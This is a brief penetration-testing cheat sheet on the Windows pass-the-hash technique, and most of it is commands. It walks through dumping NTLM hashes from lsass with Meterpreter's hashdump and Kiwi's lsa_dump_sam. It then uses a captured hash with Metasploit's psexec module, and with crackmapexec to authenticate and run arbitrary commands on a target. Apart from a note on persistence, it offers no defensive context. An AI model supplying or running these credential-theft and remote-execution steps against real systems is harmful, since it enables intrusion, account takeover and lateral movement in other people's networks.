Pass-the-Hash

It is an exploitation technique that involves capturing NTLM hashes or clear-text passwords, and using them to authenticate with the target legitimately.

Multiple tools can be used: - Metasploit PsExec module - Crackmapexec

This technique is a form of persistence even if the initial entry vulnerability was patched.

Exploitation

Metasploit

First, an exploit is needed to obtain initial access to the system. Once achieved, execute the following commands:

# Migrate to lsass process
pgrep lsass

migrate LSASS_PID

# Dump hashes
hashdump

# NTLM hash can also be retrieved with Kiwi
load kiwi
# Get NTLM hashes using Kiwi
lsa_dump_sam

# Background meterpreter session
Ctrl+Z

#  Metasploit PsExec module
use exploit/windows/smb/psexec

# Change default port
set LPORT 4422

set RHOSTS TARGET_IP

set SMBUser TARGET_USER # Example: Administrator
set SMBPass NT_HASH:NTLM_HASH

# Configure the target
set target Native\ upload

exploit

Crackmapexec

# Initial connection
crackmapexec smb TARGET_IP -u TARGET_USER -H "NTLM_HASH"

# Execute commands
crackmapexec smb TARGET_IP -u TARGET_USER -H "NTLM_HASH" -x "COMMAND"